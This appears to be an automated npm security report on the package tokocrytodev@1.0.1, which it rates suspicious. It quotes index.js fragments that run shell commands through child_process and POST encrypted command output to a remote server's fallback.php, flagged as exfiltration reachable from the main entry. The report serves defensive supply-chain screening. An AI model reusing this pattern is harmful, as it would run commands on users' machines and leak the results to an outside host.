---
canonical: "https://firewall.lpm.dev/npm/tokocrytodev/v/1.0.1"
markdown: "https://firewall.lpm.dev/npm/tokocrytodev/v/1.0.1.md"
package: "tokocrytodev"
report_status: "published"
title: "tokocrytodev@1.0.1 npm security report"
verdict: "suspicious"
version: "1.0.1"
---

# tokocrytodev@1.0.1 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Flagged — allowed with a warning** — Allowed by default policy, but 8 finding(s) warrant review before installing.

- **Verdict:** Suspicious
- **Product-default install policy:** Warn
- **Firewall policy:** Matched warn-list
- **Public report status:** Published
- **Threat category:** None published
- **Selected version:** 1.0.1
- **Selected version is latest:** Yes
- **Analysis source:** Static Scan Results (rust-scanner)

Static analysis flagged 8 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Verdict:** Suspicious
- **Confidence:** 72.0%
- **Started:** 2026-08-09T07:56:57.433Z
- **Finished:** 2026-08-09T07:56:57.971Z
- **Download time:** 503 ms
- **Static scan time:** 34 ms
- **AI review time:** Not available
- **Total time:** 538 ms

## Security analysis

No additional public attack-surface or AI-review details are available.

## Public findings

### 1. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 2. High: Child Process
- **Category:** Source
- **Confidence:** 85.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/tokocrytodev@1.0.1/index.js>)

Package source references child process execution.

Public source snippet (untrusted):

```javascript
L2: const path = require('path');
L3: const { exec } = require('child_process');
L4: const util = require('util');
```

### 3. Medium: Network
- **Category:** Source
- **Confidence:** 75.0%

Package source references network APIs.

### 4. Medium: Environment Vars
- **Category:** Source
- **Confidence:** 75.0%

Package source references environment variables.

### 5. Low: Filesystem
- **Category:** Source
- **Confidence:** 70.0%

Package source references filesystem APIs.

### 6. High: Command Output Exfiltration
- **Category:** Source
- **Confidence:** 82.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/tokocrytodev@1.0.1/index.js>)

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

Public source snippet (untrusted):

```javascript
L91: const encrypted = encryptECB(payload);
L92: await axios.post(`${this.server}/fallback.php`, encrypted, {
L93: headers: { 'Content-Type': 'text/plain' },
...
L102: try {
L103: const { stdout, stderr } = await execAsync(cmd, { timeout: 30000 });
L104: return stdout + stderr;
```

### 7. High: Trigger Reachable Command Output Exfiltration
- **Category:** Source
- **Confidence:** 94.0%
- **Path:** index.js
- **Public source:** [View source](<https://unpkg.com/tokocrytodev@1.0.1/index.js>)

A manifest entrypoint or package-local install chain reaches command-output exfiltration behavior.

Public source snippet (untrusted):

```javascript
Trigger-reachable command-output exfiltration chain: manifest.main -> index.js
L91: const encrypted = encryptECB(payload);
L92: await axios.post(`${this.server}/fallback.php`, encrypted, {
L93: headers: { 'Content-Type': 'text/plain' },
...
L102: try {
L103: const { stdout, stderr } = await execAsync(cmd, { timeout: 30000 });
L104: return stdout + stderr;
```

### 8. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

## Dependencies and install lifecycle
- **Lifecycle scripts present:** No

- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 0
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** tokocrytodev
- **Ecosystem:** npm
- **Version:** 1.0.1
- **License:** ISC
- **Version published:** 2026-08-09T07:55:13.966Z
- **Package first seen:** 2026-08-09T07:56:57.971Z
- **Package last seen:** 2026-08-10T12:25:05.209Z
- **Known versions:** 2
- **Latest version:** 1.0.1
- **Appeal under review:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/tokocrytodev/v/1.0.1>)
